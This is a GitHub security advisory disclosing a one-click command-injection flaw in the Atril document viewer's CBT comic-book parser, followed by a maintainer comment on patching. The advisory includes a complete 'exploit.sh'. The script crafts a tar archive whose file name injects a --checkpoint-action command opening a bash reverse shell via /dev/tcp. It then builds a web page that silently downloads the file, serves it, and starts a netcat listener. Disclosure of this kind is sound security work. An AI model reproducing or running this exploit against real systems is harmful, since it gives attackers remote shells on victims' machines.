You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Critical Remote Code Execution Vulnerability in Atril's CBT comic book parsing
Critical
lukefromdc
published
GHSA-34rr-j8v9-v4p2Jan 7, 2024
·
2 comments
Package
Atril
Affected versions
<= latest
Patched versions
None
Description
Summary
A Critical One-Click RCE/Command Injection Vulnerability Affecting Popular Linux Operating Systems with MATE, Cinnamon, and some Xfce desktop Environments.
Affected Operating Systems:
Kali Linux (Popular OS among Security professionals, researchers)
Parrot OS (Popular OS among Security professionals, researchers)
Ubuntu-Mate
Xubuntu
Fedora Cinnamon
Fedora Mate
Manjaro Mate
Manjaro Cinnamon
Ubuntu Kylin (Official Chinese Ubuntu)
Kylin OS V10 ( OS said to be used in the Chinese Government Sectors )
And other MATE, Cinnamon, and some Xfce desktop Environments.
Affected Software Component: All versions including the latest versions of Atril Document Viewer (Default Doc reader for MATE environment, one of the popular doc readers).
Vulnerability Summary:
This is a one-click Remote Command Execution vulnerability that gives the attacker immediate access to the target system when the target user opens a crafted document or clicks on a crafted link/URL.
This vulnerability is due to a bad code segment in Atril responsible for handling comic book documents (.cbr, .cbz, .cbt, .cb7). Comic book documents are just archives that contain images in it. The vulnerability here can be exploited using a maliciously crafted CBT document which is a TAR archive.
Root Cause - Vulnerable Code segment in both doc viewers (comics-document.c):
By looking at the above code, we can see that there are shell commands used for decompression. Look at the /* tar */ section, it actually calls the following shell command, "tar -xOf -tf ". This is to view/load each image inside the CBT document. This behavior can be exploited by using an option of tar program '--checkpoint-action' to execute arbitrary commands on the target by naming one of the images inside the CBT document to something like '--checkpoint-action=EXEC=bash -c "whoami>/tmp/who.txt";.jpg'.
This vulnerability was already found in Evince Document viewer (the default Doc reader of GNOME) back in 2017. Since Atril is a fork of Evince, this vulnerability was present in Atril. Atril's team fixed the vulnerability at that time by adding a piece of code that quits Atril's process if the CBT file with "--checkpoint-action=" in its name. The following was the patch (comics-document.c) (line - 983):
As you can see, it throws a "File Unsupported" message to the console and quits when it sees "--checkpoint-action=" in a page/filename. I noticed that this only works with an empty file or a really small image file, and if we provide a larger file with more bytes, the "gtk_main_quit ();" function fails, so it continues to run, thus executing the injected arbitrary command.
In the MATE desktop environment, many XFCE and lightweight desktop environments (including OS like Kali, Parrot, Xubuntu, Ubuntu Mate, Kylin, Fedora Mate, Manjaro Mate), this vulnerability can be exploited just by sending a link/URL because these Operating Systems/Environments has Atril and Atril has an additional component called atril-previewer that will trigger the exploit without even opening or clicking on the document. An attacker can craft a webpage that instantly downloads the crafted CBT file onto the target system when the target user visits the webpage and the latest Firefox browser nowadays downloads automatically by default without user confirmation, when the user navigates to his Downloads directory the payload will be executed, gives the attacker the shell.
I have attached a fully working exploit with this submission.
In the demo video, the following is the scenario:
Attacker Machine - Kali Linux
Victim Machine - Kali Linux latest edition (2023.3) Victim visits the malicious URL/Link generated by my exploit script
Exploit Dependencies: poppler-utils
Please install poppler-utils before running the exploit script on your Linux machine (Kali preferred). Installation: apt install poppler-utils.
exploit.sh
#! /bin/bash
# Requires pdftoppm from poppler-utils
banner(){
echo "
╔╦╗┌─┐┌─┐╔╦╗┌─┐┬─┐
║║│ ││ ║ ├─┤├┬┘
═╩╝└─┘└─┘ ╩ ┴ ┴┴└─
╔═╗┌┬┐┬─┐┬┬ ╦┌┐┌ ┬┌─┐┌─┐┌┬┐
╠═╣ │ ├┬┘││───║│││ │├┤ │ │
╩ ╩ ┴ ┴└─┴┴─┘ ╩┘└┘└┘└─┘└─┘ ┴
0-day Exploit
-by Febin (@febin_nj)
[ Affected OS: Kali, Parrot OS, Linux Mint, Ubuntu-Mate, Xubuntu, Ubuntu-Kylin, Kylin OS, Fedora-Mate, Fedora-Cinnamon, Manjaro Mate, Manjaro Cinnamon ]
[ Affected Software: Atril Document viewer, Xreader ]
"
}
mainProgram(){
printf " [>] LHOST: "
read IP
printf " [>] LPORT: "
read LPORT
printf "[>] Location to the PDF to spoof [Default: sample.pdf]: "
read pdf_path
pdf_path=${pdf_path:-./sample.pdf}
export PAYLOAD="0<\&34-;exec 34<>/dev/tcp/${IP}/${LPORT};bash -i <\&34 >\&34 2>\&34"
echo "/Creator (Adobe Acrobat)" > emptyfile
tar -cf poc.cbt --transform="s|emptyfile|%PDF-1.4
%âã
1 0 obj
<<
/Title (TEST PDF file)
/Creator (Adobe Acrobat)
/Producer (Qt 5.15.8)
/CreationDate (D:20230812194726)
>>
endobj
|" emptyfile
mkdir Pages 2>/dev/null
pdftoppm ${pdf_path} Pages/Page -jpeg
tar -uf poc.cbt Pages/*.jpg
cp Pages/Page-1.jpg feb.jpg
tar -P -uf poc.cbt --transform="s|feb.jpg| --checkpoint-action=exec=bash -c '$PAYLOAD';.jpg|" feb.jpg
rm -rf emptyfile
mkdir output/ 2>/dev/null
mv poc.cbt output/poc.cbt
rm -rf feb.jpg
rm -rf Pages/
echo "[+] Malicious Comic document is generated: $(realpath output/poc.cbt)"
printf " Do you want to start the listener here? [Y/n]: "
read choice
b64data="$(cat output/poc.cbt | base64 -w0)"
echo "
<body>
<h1>HELLO</h1>
</body>
<script>
filename = \"poc.cbt\"
filedata = \"$b64data\"
function base64tobytes(base64data){
var binaryValues = atob(base64data);
var binaryLength = binaryValues.length
var bytesData = new Uint8Array(binaryLength);
for ( var i = 0; i < binaryLength; i++){
bytesData[i] = binaryValues.charCodeAt(i);
}
return bytesData.buffer;
}
var fileBytes = base64tobytes(filedata);
var blob = new Blob([fileBytes], {\"type\":\"octet/stream\"});
var anchor = document.createElement(\"a\");
document.body.append(anchor);
anchor.style = \"display: None;\"
var url = window.URL.createObjectURL(blob);
anchor.href = url;
anchor.download = filename;
anchor.click();
window.URL.revokeObjectURL(url);
</script>
" > output/index.html
python3 -m http.server 8888 -d output/ >/dev/null 2>&1 &
echo "[+] Web server started on port 8888.."
echo "[+] Send the link http://[your-ip-address]:8888/index.html to the victim."
echo " "
trap "killall python3; exit" INT
if [[ ${choice} == "Y" || ${choice} == "y" ]]
then
trap "killall python3; exit" INT
nc -nlvp "$LPORT"
else
echo "[+] Exiting.."
killall python3
exit
fi
}
if [ $(which pdftoppm) ]
then
banner
mainProgram
else
echo "[-] pdftoppm not found! Please install poppler-utils to run this exploit."
exit
fi
Atril_0day_demo.2.mp4
Impact
Remote Code Execution on the target system.
The atril-previewer makes this vulnerability more dangerous as it can be exploited by a sing Link/URL to achieve RCE.
On Mon, 8 Jan, 2024, 3:48 am Luke from DC, ***@***.***> wrote:
Published GHSA-34rr-j8v9-v4p2.
--
Reply to this email directly or view it on GitHub:
https://github.com/mate-desktop/atril/security/advisories/GHSA-34rr-j8v9-v4p2#event-128009
You are receiving this because you are either an administrator on
mate-desktop/atril, or a collaborator on GHSA-34rr-j8v9-v4p2.
Message ID: <mate-desktop/atril/repository-advisories/28971/events/
***@***.***>
I will need assistance from the rest of the team with this! I do not even know how to edit the advisary. I do not have an account at Transifex so I cannot create a new release. This needs to be backported to 1.26 as a cherrypick fails on a file conflict.
Distros of course can release a build of Atril (ANY version) with comics support disabled right now, then when this gets backported to 1.26 push that out the door.
Summary
A Critical One-Click RCE/Command Injection Vulnerability Affecting Popular Linux Operating Systems with MATE, Cinnamon, and some Xfce desktop Environments.
Affected Operating Systems:
Kali Linux (Popular OS among Security professionals, researchers)
Parrot OS (Popular OS among Security professionals, researchers)
Ubuntu-Mate
Xubuntu
Fedora Cinnamon
Fedora Mate
Manjaro Mate
Manjaro Cinnamon
Ubuntu Kylin (Official Chinese Ubuntu)
Kylin OS V10 ( OS said to be used in the Chinese Government Sectors )
And other MATE, Cinnamon, and some Xfce desktop Environments.
Affected Software Component: All versions including the latest versions of Atril Document Viewer (Default Doc reader for MATE environment, one of the popular doc readers).
Vulnerability Summary:
This is a one-click Remote Command Execution vulnerability that gives the attacker immediate access to the target system when the target user opens a crafted document or clicks on a crafted link/URL.
This vulnerability is due to a bad code segment in Atril responsible for handling comic book documents (.cbr, .cbz, .cbt, .cb7). Comic book documents are just archives that contain images in it. The vulnerability here can be exploited using a maliciously crafted CBT document which is a TAR archive.
Root Cause - Vulnerable Code segment in both doc viewers (comics-document.c):
By looking at the above code, we can see that there are shell commands used for decompression. Look at the /* tar */ section, it actually calls the following shell command, "tar -xOf -tf ". This is to view/load each image inside the CBT document. This behavior can be exploited by using an option of tar program '--checkpoint-action' to execute arbitrary commands on the target by naming one of the images inside the CBT document to something like '--checkpoint-action=EXEC=bash -c "whoami>/tmp/who.txt";.jpg'.
This vulnerability was already found in Evince Document viewer (the default Doc reader of GNOME) back in 2017. Since Atril is a fork of Evince, this vulnerability was present in Atril. Atril's team fixed the vulnerability at that time by adding a piece of code that quits Atril's process if the CBT file with "--checkpoint-action=" in its name. The following was the patch (comics-document.c) (line - 983):
As you can see, it throws a "File Unsupported" message to the console and quits when it sees "--checkpoint-action=" in a page/filename. I noticed that this only works with an empty file or a really small image file, and if we provide a larger file with more bytes, the "gtk_main_quit ();" function fails, so it continues to run, thus executing the injected arbitrary command.
In the MATE desktop environment, many XFCE and lightweight desktop environments (including OS like Kali, Parrot, Xubuntu, Ubuntu Mate, Kylin, Fedora Mate, Manjaro Mate), this vulnerability can be exploited just by sending a link/URL because these Operating Systems/Environments has Atril and Atril has an additional component called atril-previewer that will trigger the exploit without even opening or clicking on the document. An attacker can craft a webpage that instantly downloads the crafted CBT file onto the target system when the target user visits the webpage and the latest Firefox browser nowadays downloads automatically by default without user confirmation, when the user navigates to his Downloads directory the payload will be executed, gives the attacker the shell.
I have attached a fully working exploit with this submission.
In the demo video, the following is the scenario:
Attacker Machine - Kali Linux
Victim Machine - Kali Linux latest edition (2023.3)
Victim visits the malicious URL/Link generated by my exploit script
Exploit Dependencies: poppler-utils
Please install poppler-utils before running the exploit script on your Linux machine (Kali preferred). Installation: apt install poppler-utils.
exploit.sh
Atril_0day_demo.2.mp4
Impact
Remote Code Execution on the target system.
The atril-previewer makes this vulnerability more dangerous as it can be exploited by a sing Link/URL to achieve RCE.